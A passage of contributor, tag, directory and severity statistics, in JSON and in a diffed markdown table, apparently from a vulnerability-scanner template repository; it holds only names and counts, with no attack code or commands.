farhi","count":4},{"name":"incogbyte","count":4},{"name":"h1ei1","count":4},{"name":"e_schultze_","count":4},{"name":"3th1c_yuk1","count":4},{"name":"shine","count":4},{"name":"powerexploit","count":4},{"name":"dadevel","count":4},{"name":"r3naissance","count":4},{"name":"scent2d","count":4},{"name":"binaryfigments","count":3},{"name":"whoever","count":3},{"name":"dr0pd34d","count":3},{"name":"alifathi-h1","count":3},{"name":"skeltavik","count":3},{"name":"vagnerd","count":3},{"name":"_generic_human_","count":3},{"name":"arcc","count":3},{"name":"ekrause","count":3},{"name":"andydoering","count":3},{"name":"jarijaas","count":3},{"name":"swissky","count":3},{"name":"cheesymoon","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"hahwul","count":3},{"name":"emenalf","count":3},{"name":"vsh00t","count":3},{"name":"matt galligan","count":3},{"name":"fyoorer","count":3},{"name":"shifacyclewala","count":3},{"name":"z3bd","count":3},{"name":"huowuzhao","count":3},{"name":"ph33r","count":3},{"name":"johnjhacking","count":3},{"name":"canberbamber","count":3},{"name":"mavericknerd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"bernardofsr","count":3},{"name":"lark-lab","count":3},{"name":"f1tz","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"ambassify","count":3},{"name":"splint3r7","count":3},{"name":"davidmckennirey","count":3},{"name":"kazet","count":3},{"name":"evergreencartoons","count":3},{"name":"sushantkamble","count":3},{"name":"me9187","count":3},{"name":"taielab","count":3},{"name":"dudez","count":3},{"name":"atomiczsec","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"badboycxcc","count":3},{"name":"bhutch","count":3},{"name":"fxploit","count":3},{"name":"mastercho","count":3},{"name":"arm!tage","count":3},{"name":"true13","count":3},{"name":"lucasljm2001","count":3},{"name":"0w4ys","count":3},{"name":"k0pak4","count":3},{"name":"cckuakilong","count":2},{"name":"udit_thakkur","count":2},{"name":"666asd","count":2},{"name":"heeress","count":2},{"name":"bsysop","count":2},{"name":"rafaelwdornelas","count":2},{"name":"d4vy","count":2},{"name":"joshlarsen","count":2},{"name":"ree4pwn","count":2},{"name":"supras","count":2},{"name":"brucelsone","count":2},{"name":"m4lwhere","count":2},{"name":"n-thumann","count":2},{"name":"socketz","count":2},{"name":"kre80r","count":2},{"name":"ehsahil","count":2},{"name":"redteambrasil","count":2},{"name":"nybble04","count":2},{"name":"wa1tf0rme","count":2},{"name":"codexlynx","count":2},{"name":"dogancanbakir","count":2},{"name":"martincodes-de","count":2},{"name":"coldfish","count":2},{"name":"8arthur","count":2},{"name":"koti2","count":2},{"name":"nvn1729","count":2},{"name":"dbrwsky","count":2},{"name":"megamansec","count":2},{"name":"w4cky_","count":2},{"name":"uomogrande","count":2},{"name":"thardt-praetorian","count":2},{"name":"x1m_martijn","count":2},{"name":"github.com/its0x08","count":2},{"name":"0xsapra","count":2},{"name":"0xelkomy","count":2},{"name":"lotusdll","count":2},{"name":"amsda","count":2},{"name":"bp0lr","count":2},{"name":"bing0o","count":2},{"name":"streetofhackerr007","count":2},{"name":"paradessia","count":2},{"name":"dahse89","count":2},{"name":"convisoappsec","count":2},{"name":"0xrudra","count":2},{"name":"manas_harsh","count":2},{"name":"hetroublemakr","count":2},{"name":"brenocss","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"notnotnotveg","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"shelled","count":2},{"name":"afaq","count":2},{"name":"0xsmiley","count":2},{"name":"y4er","count":2},{"name":"g4l1t0","count":2},{"name":"myztique","count":2},{"name":"sinkettu","count":2},{"name":"bananabr","count":2},{"name":"vavkamil","count":2},{"name":"paperpen","count":2},{"name":"v0idc0de","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"sbani","count":2},{"name":"lum8rjack","count":2},{"name":"thezakman","count":2},{"name":"clarkvoss","count":2},{"name":"geekby","count":2},{"name":"cocxanh","count":2},{"name":"foulenzer","count":2},{"name":"zomsop82","count":2},{"name":"randomrobbie","count":2},{"name":"sy3omda","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"0xcrypto","count":2},{"name":"luci","count":2},{"name":"korteke","count":2},{"name":"gevakun","count":2},{"name":"raesene","count":2},{"name":"danielmofer","count":2},{"name":"hackerarpan","count":2},{"name":"parth","count":2},{"name":"dheerajmadhukar","count":2},{"name":"z0ne","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"ajaysenr","count":2},{"name":"mohammedsaneem","count":2},{"name":"kishore-hariram","count":2},{"name":"randomdhiraj","count":2},{"name":"gal nagli","count":2},{"name":"sascha brendel","count":2},{"name":"nuk3s3c","count":2},{"name":"maximus decimus","count":2},{"name":"k11h-de","count":2},{"name":"moritz nentwig","count":2},{"name":"joeldeleep","count":2},{"name":"joshua rogers","count":2},{"name":"j3ssie","count":2},{"name":"smaranchand","count":2},{"name":"nkxxkn","count":2},{"name":"0xnirvana","count":2},{"name":"pxmme1337","count":2},{"name":"c3l3si4n","count":2},{"name":"ynnirc","count":1},{"name":"1nf1n7y","count":1},{"name":"ahmed sherif","count":1},{"name":"zy9ard3","count":1},{"name":"yuansec","count":1},{"name":"dhiyaneshdki","count":1},{"name":"supr4s","count":1},{"name":"mrcl0wnlab","count":1},{"name":"lrtk-coder","count":1},{"name":"elouhi","count":1},{"name":"revblock","count":1},{"name":"unp4ck","count":1},{"name":"jcockhren","count":1},{"name":"alevsk","count":1},{"name":"oscarintherocks","count":1},{"name":"dali","count":1},{"name":"deena","count":1},{"name":"exid","count":1},{"name":"aayush vishnoi","count":1},{"name":"marcos_iaf","count":1},{"name":"0xd0ff9","count":1},{"name":"rotembar","count":1},{"name":"y0no","count":1},{"name":"mukundbhuva","count":1},{"name":"xshuden","count":1},{"name":"pudsec","count":1},{"name":"aron molnar","count":1},{"name":"akash.c","count":1},{"name":"mabdullah22","count":1},{"name":"nytr0gen","count":1},{"name":"flag007","count":1},{"name":"kiks7","count":1},{"name":"mihhailsokolov","count":1},{"name":"majidmc2","count":1},{"name":"anon-artist","count":1},{"name":"kagamigawa","count":1},{"name":"lixts","count":1},{"name":"jteles","count":1},{"name":"hczdmr","count":1},{"name":"ndmalc","count":1},{"name":"fq_hsu","count":1},{"name":"af001","count":1},{"name":"thebinitghimire","count":1},{"name":"jbertman","count":1},{"name":"kareemse1im","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"danigoland","count":1},{"name":"yashgoti","count":1},{"name":"borna nematzadeh","count":1},{"name":"keni0k","count":1},{"name":"husain","count":1},{"name":"osamahamad","count":1},{"name":"alex","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ransomsec","count":1},{"name":"patrick pirker","count":1},{"name":"booboohq","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"vzamanillo","count":1},{"name":"exploitation","count":1},{"name":"skylark-lab","count":1},{"name":"gtrrnr","count":1},{"name":"opencirt","count":1},{"name":"hanlaomo","count":1},{"name":"rubina119","count":1},{"name":"juicypotato1","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"furkansayim","count":1},{"name":"allenwest24","count":1},{"name":"mzack9999","count":1},{"name":"chron0x","count":1},{"name":"gboddin","count":1},{"name":"noobexploiter","count":1},{"name":"elmahdi","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"sak1","count":1},{"name":"amnotacat","count":1},{"name":"ofjaaah","count":1},{"name":"jrolf","count":1},{"name":"iampritam","count":1},{"name":"paper-pen","count":1},{"name":"patralos","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"becivells","count":1},{"name":"co0nan","count":1},{"name":"_harleo","count":1},{"name":"ahmed abou-ela","count":1},{"name":"th3.d1p4k","count":1},{"name":"wabafet","count":1},{"name":"xstp","count":1},{"name":"intx0x80","count":1},{"name":"alperenkesk","count":1},{"name":"calumjelrick","count":1},{"name":"zhenwarx","count":1},{"name":"vinit989","count":1},{"name":"s1r1u5_","count":1},{"name":"pry0cc","count":1},{"name":"jiheon-dev","count":1},{"name":"jeya.seelan","count":1},{"name":"tirtha_mandal","count":1},{"name":"mubassirpatel","count":1},{"name":"iphantasmic","count":1},{"name":"kiransau","count":1},{"name":"narluin","count":1},{"name":"tea","count":1},{"name":"whynotke","count":1},{"name":"d0rkerdevil","count":1},{"name":"orpheus","count":1},{"name":"rschio","count":1},{"name":"_darrenmartyn","count":1},{"name":"hardik-rathod","count":1},{"name":"makyotox","count":1},{"name":"remonsec","count":1},{"name":"harshinsecurity","count":1},{"name":"nerrorsec","count":1},{"name":"blckraven","count":1},{"name":"5up3r541y4n","count":1},{"name":"p-l-","count":1},{"name":"breno_css","count":1},{"name":"akshansh","count":1},{"name":"arall","count":1},{"name":"clment cruchet","count":1},{"name":"rodnt","count":1},{"name":"ptonewreckin","count":1},{"name":"thelicato","count":1},{"name":"piyushchhiroliya","count":1},{"name":"omarkurt","count":1},{"name":"nielsing","count":1},{"name":"r3nz0","count":1},{"name":"evolutionsec","count":1},{"name":"ooooooo_q","count":1},{"name":"arr0way","count":1},{"name":"xeldax","count":1},{"name":"queencitycyber","count":1},{"name":"b4uh0lz","count":1},{"name":"jaskaran","count":1},{"name":"mhdsamx","count":1},{"name":"tirtha","count":1},{"name":"caon","count":1},{"name":"izn0u","count":1},{"name":"compr00t","count":1},{"name":"jaimin gondaliya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"shiva (strobes security)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"dmartyn","count":1},{"name":"brabbit10","count":1},{"name":"undefl0w","count":1},{"name":"aringo","count":1},{"name":"manuelbua","count":1},{"name":"tehtbl","count":1},{"name":"petergrifin","count":1},{"name":"retr02332","count":1},{"name":"rojanrijal","count":1},{"name":"ayadim","count":1},{"name":"phyr3wall","count":1},{"name":"noamrathaus","count":1},{"name":"sinsinology","count":1},{"name":"f1she3","count":1},{"name":"esonhugh","count":1},{"name":"omarjezi","count":1},{"name":"manasmbellani","count":1},{"name":"ok_bye_now","count":1},{"name":"luqman","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"0ut0fb4nd","count":1},{"name":"duty_1g","count":1},{"name":"adrianmf","count":1},{"name":"apt-mirror","count":1},{"name":"regala_","count":1},{"name":"secthebit","count":1},{"name":"geraldino2","count":1},{"name":"juliosmelo","count":1},{"name":"ola456","count":1},{"name":"bugvsme","count":1},{"name":"nobody","count":1},{"name":"bughuntersurya","count":1},{"name":"sleepingbag945","count":1},{"name":"aresx","count":1},{"name":"charanrayudu","count":1},{"name":"djoevanka","count":1},{"name":"lamscun","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"th3r4id","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"un-fmunozs","count":1},{"name":"soyelmago","count":1},{"name":"retr0","count":1},{"name":"michael wedl","count":1},{"name":"couskito","count":1},{"name":"pascalheidmann","count":1},{"name":"udyz","count":1},{"name":"jeya seelan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"alexrydzak","count":1},{"name":"0xceba","count":1},{"name":"momen eldawakhly","count":1},{"name":"toufik-airane","count":1},{"name":"luqmaan hadia","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"mantissts","count":1},{"name":"realexp3rt","count":1},{"name":"spac3wh1te","count":1},{"name":"dievus","count":1},{"name":"lark lab","count":1},{"name":"andysvints","count":1},{"name":"yashanand155","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"h4kux","count":1},{"name":"tarunkoyalwar","count":1},{"name":"pussycat0","count":1},{"name":"miroslavsotak","count":1},{"name":"shreyapohekar","count":1},{"name":"x6263","count":1},{"name":"aaronchen0","count":1},{"name":"colbyjack1134","count":1},{"name":"shifacyclewla","count":1},{"name":"andirrahmani1","count":1},{"name":"galoget","count":1},{"name":"imhunterand","count":1},{"name":"hakluke","count":1},{"name":"palanichamy_perumal","count":1},{"name":"jonathanwalker","count":1},{"name":"marcio mendes","count":1},{"name":"ayadi","count":1},{"name":"infosecsanyam","count":1},{"name":"bad5ect0r","count":1},{"name":"_c0wb0y_","count":1},{"name":"ipanda","count":1},{"name":"sicksec","count":1},{"name":"shelld3v","count":1},{"name":"zandros0","count":1},{"name":"shockwave","count":1},{"name":"lingtren","count":1},{"name":"carrot2","count":1},{"name":"jbaines-r7","count":1},{"name":"elder tao","count":1},{"name":"0h1in9e","count":1},{"name":"rivalsec","count":1},{"name":"kchason","count":1},{"name":"official_blackhat13","count":1},{"name":"noraj","count":1},{"name":"metascan","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"freakyclown","count":1},{"name":"dabla","count":1},{"name":"pdp","count":1},{"name":"kailashbohara","count":1},{"name":"ramondunker","count":1},{"name":"natto97","count":1},{"name":"ilovebinbash","count":1},{"name":"b0rn2r00t","count":1},{"name":"liquidsec","count":1},{"name":"bjhulst","count":1},{"name":"mass0ma","count":1},{"name":"mr. bobo hp","count":1},{"name":"j33n1k4","count":1},{"name":"mbmy","count":1},{"name":"myst7ic","count":1},{"name":"zeyad azima","count":1},{"name":"barthy.koeln","count":1},{"name":"qlkwej","count":1},{"name":"miryangjung","count":1},{"name":"sherlocksecurity","count":1},{"name":"8authur","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"francescocarlucci","count":1},{"name":"ph33rr","count":1},{"name":"zinminphy0","count":1},{"name":"daffianfo","count":1},{"name":"lethargynavigator","count":1},{"name":"exceed","count":1},{"name":"igibanez","count":1},{"name":"hazana","count":1},{"name":"houdinis","count":1},{"name":"nuts7","count":1},{"name":"mah3sec_","count":1},{"name":"kaizensecurity","count":1},{"name":"bywalks","count":1},{"name":"0xh7ml","count":1},{"name":"micha3lb3n","count":1},{"name":"justmumu","count":1},{"name":"viniciuspereiras","count":1},{"name":"fmunozs","count":1},{"name":"droberson","count":1},{"name":"amanrawat","count":1},{"name":"petruknisme","count":1},{"name":"hakimkt","count":1},{"name":"bartu utku sarp","count":1},{"name":"jc175","count":1},{"name":"nagli","count":1},{"name":"pjborah","count":1},{"name":"kr1shna4garwal","count":1},{"name":"evan rubinstien","count":1},{"name":"mariam tariq","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"naglis","count":1},{"name":"cookiehanhoan","count":1},{"name":"am0nt31r0","count":1},{"name":"open-sec","count":1},{"name":"viondexd","count":1},{"name":"shivampand3y","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"act1on3","count":1},{"name":"akokonunes","count":1},{"name":"2rs3c","count":1},{"name":"carlosvieira","count":1},{"name":"failopen","count":1},{"name":"ahmetpergamum","count":1},{"name":"notsoevilweasel","count":1},{"name":"knassar702","count":1},{"name":"therealtoastycat","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"dale clarke","count":1},{"name":"erethon","count":1},{"name":"luskabol","count":1},{"name":"ringo","count":1},{"name":"furkansenan","count":1},{"name":"w0tx","count":1},{"name":"sickwell","count":1},{"name":"0xceeb","count":1},{"name":"fopina","count":1},{"name":"0xtavian","count":1},{"name":"stupidfish","count":1},{"name":"unkl4b","count":1},{"name":"davidfegyver","count":1},{"name":"wlayzz","count":1},{"name":"gpiechnik2","count":1},{"name":"higor melgaço","count":1},{"name":"httpvoid","count":1},{"name":"push4d","count":1},{"name":"absshax","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"tim_koopmans","count":1},{"name":"elitebaz","count":1},{"name":"b0yd","count":1},{"name":"ling","count":1},{"name":"philippdelteil","count":1},{"name":"kabirsuda","count":1},{"name":"udinchan","count":1},{"name":"0xteles","count":1},{"name":"berkdusunur","count":1},{"name":"dk999","count":1},{"name":"jub0bs","count":1},{"name":"irshadahamed","count":1},{"name":"jna1","count":1},{"name":"ggranjus","count":1},{"name":"ldionmarcil","count":1},{"name":"sec_hawk","count":1},{"name":"dwbzn","count":1},{"name":"topscoder","count":1},{"name":"willd96","count":1},{"name":"thevillagehacker","count":1},{"name":"florianmaak","count":1},{"name":"kurohost","count":1},{"name":"ramkrishna sawant","count":1},{"name":"rotemreiss","count":1},{"name":"prettyboyaaditya","count":1},{"name":"dawid-czarnecki","count":1},{"name":"0xrod","count":1},{"name":"ohlinge","count":1},{"name":"daviey","count":1},{"name":"xcapri","count":1},{"name":"screamy","count":1},{"name":"pratik khalane","count":1},{"name":"hexcat","count":1},{"name":"jas37","count":1},{"name":"arjunchandarana","count":1},{"name":"sshell","count":1},{"name":"mesaglio","count":1},{"name":"shiar","count":1}],"directory":[{"name":"http","count":5970},{"name":"workflows","count":190},{"name":"file","count":130},{"name":"network","count":98},{"name":"ssl","count":24},{"name":"dns","count":18},{"name":"headless","count":9},{"name":"contributors.json","count":1},{"name":"cves.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":2907},{"name":"high","count":1298},{"name":"medium","count":1076},{"name":"critical","count":717},{"name":"low","count":224},{"name":"unknown","count":27}],"types":[{"name":"file","count":130},{"name":"dns","count":18}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index c1226ff6b5..7d16691de6 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,3420 +1,3450 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-------------------------------------------------|-------|-------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1882 | dhiyaneshdk | 867 | http | 5927 | info | 2894 | file | 123 | -| panel | 904 | dwisiswant0 | 794 | workflows | 190 | high | 1282 | dns | 18 | -| wordpress | 785 | daffainfo | 664 | file | 123 | medium | 1063 | | | -| exposure | 689 | pikpikcu | 353 | network | 96 | critical | 710 | | | -| wp-plugin | 676 | pdteam | 278 | ssl | 24 | low | 221 | | | -| osint | 652 | pussycat0x | 255 | dns | 18 | unknown | 27 | | | -| xss | 648 | geeknik | 221 | headless | 9 | | | | | -| tech | 612 | ricardomaia | 219 | TEMPLATES-STATS.json | 1 | | | | | -| edb | 597 | ritikchaddha | 215 | contributors.json | 1 | | | | | -| lfi | 551 | 0x_akoko | 179 | cves.json | 1 | | | | | -| cve2021 | 433 | theamanrawat | 166 | | | | | | | -| rce | 421 | princechaddha | 156 | | | | | | | -| cve2022 | 400 | gy741 | 144 | | | | | | | -| packetstorm | 369 | arafatansari | 119 | | | | | | | -| wpscan | 348 | tess | 108 | | | | | | | -| misconfig | 302 | madrobot | 65 | | | | | | | -| wp | 290 | zzeitlin | 64 | | | | | | | -| unauth | 268 | idealphase | 63 | | | | | | | -| token-spray | 240 | akincibor | 58 | | | | | | | -| cve2020 | 237 | for3stco1d | 55 | | | | | | | -| top-200 | 207 | r3y3r53 | 51 | | | | | | | -| osint-social | 207 | gaurang | 42 | | | | | | | -| kev | 200 | philippedelteil | 41 | | | | | | | -| sqli | 199 | righettod | 41 | | | | | | | -| authenticated | 196 | edoardottt | 40 | | | | | | | -| | 194 | pdresearch | 37 | | | | | | | -| config | 193 | c-sh0 | 35 | | | | | | | -| oast | 166 | adam crosser | 31 | | | | | | | -| token | 157 | iamnoooob | 27 | | | | | | | -| apache | 151 | ice3man | 26 | | | | | | | -| cve2018 | 150 | rootxharsh | 26 | | | | | | | -| iot | 149 | hardik-solanki | 24 | | | | | | | -| cve2019 | 148 | pwnhxl | 24 | | | | | | | -| default-login | 147 | organiccrap | 24 | | | | | | | -| joomla | 136 | techbrunchfr | 23 | | | | | | | -| file | 128 | johnk3r | 22 | | | | | | | -| login | 125 | ffffffff0x | 22 | | | | | | | -| redirect | 114 | j4vaovo | 19 | | | | | | | -| cve2010 | 112 | cckuailong | 18 | | | | | | | -| top-100 | 100 | sullo | 18 | | | | | | | -| files | 100 | parthmalhotra | 16 | | | | | | | -| router | 97 | random-robbie | 15 | | | | | | | -| cms | 95 | pr3r00t | 15 | | | | | | | -| ssrf | 94 | sheikhrishad | 15 | | | | | | | -| network | 94 | ctflearner | 14 | | | | | | | -| auth-bypass | 79 | r3dg33k | 14 | | | | | | | -| cve2017 | 77 | milo2012 | 14 | | | | | | | -| devops | 77 | sharath | 13 | | | | | | | -| cve2023 | 76 | tenbird | 13 | | | | | | | -| takeover | 73 | melbadry9 | 13 | | | | | | | -| install | 69 | 0ri2n | 13 | | | | | | | -| intrusive | 69 | theabhinavgaur | 13 | | | | | | | -| disclosure | 66 | suman_kar | 12 | | | | | | | -| oracle | 65 | lu4nx | 12 | | | | | | | -| seclists | 60 | cyllective | 11 | | | | | | | -| oss | 57 | dogasantos | 11 | | | | | | | -| cve2015 | 54 | elsfa7110 | 11 | | | | | | | -| cisco | 53 | wdahlenb | 11 | | | | | | | -| google | 53 | alph4byt3 | 10 | | | | | | | -| cve2016 | 52 | hackergautam | 10 | | | | | | | -| adobe | 50 | meme-lord | 10 | | | | | | | -| fileupload | 49 | nadino | 10 | | | | | | | -| tenable | 46 | random_robbie | 10 | | | | | | | -| logs | 46 | logicalhunter | 10 | | | | | | | -| detect | 45 | co5mos | 10 | | | | | | | -| osint-gaming | 45 | 0xpugazh | 9 | | | | | | | -| vulhub | 44 | emadshanab | 9 | | | | | | | -| atlassian | 44 | 0x240x23elu | 9 | | | | | | | -| debug | 44 | oppsec | 9 | | | | | | | -| aem | 44 | nullfuzz | 9 | | | | | | | -| vmware | 43 | fabaff | 9 | | | | | | | -| plugin | 43 | zh | 8 | | | | | | | -| osint-hobby | 42 | veshraj | 8 | | | | | | | -| cve2014 | 42 | _0xf4n9x_ | 8 | | | | | | | -| osint-porn | 42 | aashiq | 8 | | | | | | | -| hackerone | 42 | olearycrew | 8 | | | | | | | -| huntr | 40 | iamthefrogy | 8 | | | | | | | -| traversal | 37 | that_juan_ | 8 | | | | | | | -| generic | 37 | leovalcante | 7 | | | | | | | -| springboot | 36 | caspergn | 7 | | | | | | | -| jira | 36 | techryptic (@tech) | 7 | | | | | | | -| kubernetes | 35 | randomstr1ng | 7 | | | | | | | -| osint-misc | 35 | harshbothra_ | 7 | | | | | | | -| injection | 34 | kophjager007 | 7 | | | | | | | -| listing | 33 | dr_set | 7 | | | | | | | -| aws | 33 | its0x08 | 7 | | | | | | | -| deserialization | 31 | amit-jd | 7 | | | | | | | -| sap | 29 | divya_mudgal | 7 | | | | | | | -| osint-coding | 29 | imnightmaree | 6 | | | | | | | -| osint-tech | 28 | pathtaga | 6 | | | | | | | -| log4j | 28 | puzzlepeaches | 6 | | | | | | | -| cnvd | 27 | justaacat | 6 | | | | | | | -| gitlab | 27 | nodauf | 6 | | | | | | | -| misc | 26 | xelkomy | 6 | | | | | | | -| microsoft | 26 | evan rubinstein | 6 | | | | | | | -| fuzz | 25 | forgedhallpass | 6 | | | | | | | -| proxy | 25 | __fazal | 6 | | | | | | | -| php | 25 | clem9669 | 6 | | | | | | | -| jndi | 25 | ja1sh | 6 | | | | | | | -| api | 24 | praetorian-thendrickson | 6 | | | | | | | -| osint-shopping | 24 | gitlab red team | 6 | | | | | | | -| osint-finance | 24 | pentest_swissky | 6 | | | | | | | -| manageengine | 24 | devang-solanki | 6 | | | | | | | -| osint-business | 24 | panch0r3d | 5 | | | | | | | -| osint-images | 24 | r12w4n | 5 | | | | | | | -| firewall | 24 | joanbono | 5 | | | | | | | -| zoho | 23 | yanyun | 5 | | | | | | | -| k8s | 23 | kh4sh3i | 5 | | | | | | | -| cve2012 | 23 | robotshell | 5 | | | | | | | -| amazon | 23 | s0obi | 5 | | | | | | | -| wp-theme | 22 | defr0ggy | 5 | | | | | | | -| msf | 21 | prajiteshsingh | 5 | | | | | | | -| tomcat | 21 | podalirius | 5 | | | | | | | -| ibm | 21 | vicrack | 5 | | | | | | | -| weblogic | 21 | mr-xn | 5 | | | | | | | -| cloud | 21 | ganofins | 5 | | | | | | | -| c2 | 21 | wisnupramoedya | 4 | | | | | | | -| fortinet | 20 | tanq16 | 4 | | | | | | | -| cicd | 20 | shine | 4 | | | | | | | -| dlink | 19 | powerexploit | 4 | | | | | | | -| camera | 19 | 3th1c_yuk1 | 4 | | | | | | | -| struts | 19 | h1ei1 | 4 | | | | | | | -| jenkins | 19 | dolev farhi | 4 | | | | | | | -| dns | 19 | r3naissance | 4 | | | | | | | -| github | 19 | dadevel | 4 | | | | | | | -| ssl | 19 | scent2d | 4 | | | | | | | -| wavlink | 18 | e_schultze_ | 4 | | | | | | | -| osint-music | 18 | incogbyte | 4 | | | | | | | -| service | 18 | unstabl3 | 3 | | | | | | | -| ftp | 18 | ph33r | 3 | | | | | | | -| ir | 17 | fxploit | 3 | | | | | | | -| admin | 17 | me9187 | 3 | | | | | | | -| lfr | 17 | true13 | 3 | | | | | | | -| cve2011 | 17 | _generic_human_ | 3 | | | | | | | -| xxe | 16 | johnjhacking | 3 | | | | | | | -| osint-blog | 16 | canberbamber | 3 | | | | | | | -| cve2009 | 16 | bernardofsr | 3 | | | | | | | -| printer | 16 | lark-lab | 3 | | | | | | | -| nginx | 16 | ekrause | 3 | | | | | | | -| backup | 16 | badboycxcc | 3 | | | | | | | -| hp | 15 | taielab | 3 | | | | | | | -| cve2008 | 15 | splint3r7 | 3 | | | | | | | -| status | 15 | mavericknerd | 3 | | | | | | | -| magento | 15 | matt galligan | 3 | | | | | | | -| android | 15 | vsh00t | 3 | | | | | | | -| jboss | 14 | f1tz | 3 | | | | | | | -| woocommerce | 14 | skeltavik | 3 | | | | | | | -| mail | 14 | evergreencartoons | 3 | | | | | | | -| citrix | 14 | jarijaas | 3 | | | | | | | -| java | 14 | lucasljm2001 | 3 | | | | | | | -| osint-health | 14 | 0w4ys | 3 | | | | | | | -| zyxel | 14 | k0pak4 | 3 | | | | | | | -| cve2013 | 14 | huowuzhao | 3 | | | | | | | -| osint-art | 14 | thomas_from_offensity | 3 | | | | | | | -| domainmod | 14 | sushantkamble | 3 | | | | | | | -| audit | 14 | cheesymoon | 3 | | | | | | | -| confluence | 14 | ambassify | 3 | | | | | | | -| osint-dating | 13 | dr0pd34d | 3 | | | | | | | -| cuppa | 13 | emenalf | 3 | | | | | | | -| laravel | 13 | hahwul | 3 | | | | | | | -| abstractapi | 13 | swissky | 3 | | | | | | | -| fortigate | 13 | yuzhe-zhang-0 | 3 | | | | | | | -| azure | 13 | alifathi-h1 | 3 | | | | | | | -| creds-stuffing | 13 | andydoering | 3 | | | | | | | -| login-check | 13 | fyoorer | 3 | | | | | | | -| osint-political | 13 | whoever | 3 | | | | | | | -| backdoor | 12 | binaryfigments | 3 | | | | | | | -| kafka | 12 | impramodsargar | 3 | | | | | | | -| auth | 12 | arcc | 3 | | | | | | | -| dashboard | 12 | atomiczsec | 3 | | | | | | | -| netsweeper | 12 | davidmckennirey | 3 | | | | | | | -| drupal | 12 | z3bd | 3 | | | | | | | -| ruby | 12 | vagnerd | 3 | | | | | | | -| rails | 12 | yash anand @yashanand155 | 3 | | | | | | | -| webserver | 12 | kazet | 3 | | | | | | | -| airflow | 12 | dudez | 3 | | | | | | | -| git | 12 | shifacyclewala | 3 | | | | | | | -| grafana | 12 | vavkamil | 2 | | | | | | | -| vpn | 12 | shelled | 2 | | | | | | | -| graphql | 12 | manas_harsh | 2 | | | | | | | -| microweber | 12 | convisoappsec | 2 | | | | | | | -| netgear | 12 | g4l1t0 | 2 | | | | | | | -| ruijie | 12 | moritz nentwig | 2 | | | | | | | -| setup | 11 | kre80r | 2 | | | | | | | -| coldfusion | 11 | zomsop82 | 2 | | | | | | | -| osint-video | 11 | kiblyn11 | 2 | | | | | | | -| cnvd2021 | 11 | joeldeleep | 2 | | | | | | | -| npm | 11 | supras | 2 | | | | | | | -| enum | 11 | ricardo maia (brainfork) | 2 | | | | | | | -| docker | 11 | thezakman | 2 | | | | | | | -| xstream | 11 | paradessia | 2 | | | | | | | -| phpmyadmin | 11 | notnotnotveg | 2 | | | | | | | -| cisa | 11 | heeress | 2 | | | | | | | -| online-fire-reporting | 11 | wa1tf0rme | 2 | | | | | | | -| ssti | 10 | socketz | 2 | | | | | | | -| jolokia | 10 | j3ssie | 2 | | | | | | | -| glpi | 10 | afaq | 2 | | | | | | | -| spring | 10 | 0xcrypto | 2 | | | | | | | -| symfony | 10 | hetroublemakr | 2 | | | | | | | -| ssh | 10 | k11h-de | 2 | | | | | | | -| dedecms | 10 | sy3omda | 2 | | | | | | | -| dell | 10 | hackerarpan | 2 | | | | | | | -| zimbra | 10 | 0xrudra | 2 | | | | | | | -| django | 10 | smaranchand | 2 | | | | | | | -| solarview | 10 | streetofhackerr007 | 2 | | | | | | | -| digitalocean | 10 | nuk3s3c | 2 | | | | | | | -| sonicwall | 10 | udit_thakkur | 2 | | | | | | | -| headless | 10 | ree4pwn | 2 | | | | | | | -| opencats | 9 | randomrobbie | 2 | | | | | | | -| thinkphp | 9 | foulenzer | 2 | | | | | | | -| windows | 9 | y4er | 2 | | | | | | | -| vcenter | 9 | sinkettu | 2 | | | | | | | -| gitea | 9 | bananabr | 2 | | | | | | | -| scada | 9 | brenocss | 2 | | | | | | | -| kube | 9 | luci | 2 | | | | | | | -| fastjson | 9 | thardt-praetorian | 2 | | | | | | | -| redis | 9 | raesene | 2 | | | | | | | -| osint-news | 9 | rafaelwdornelas | 2 | | | | | | | -| installer | 9 | n-thumann | 2 | | | | | | | -| wso2 | 9 | w4cky_ | 2 | | | | | | | -| cache | 9 | x1m_martijn | 2 | | | | | | | -| iis | 9 | 0xnirvana | 2 | | | | | | | -| zabbix | 9 | dheerajmadhukar | 2 | | | | | | | -| sitecore | 9 | dogancanbakir | 2 | | | | | | | -| firebase | 9 | nvn1729 | 2 | | | | | | | -| bypass | 9 | bhutch | 2 | | | | | | | -| pfsense | 9 | nkxxkn | 2 | | | | | | | -| prometheus | 9 | 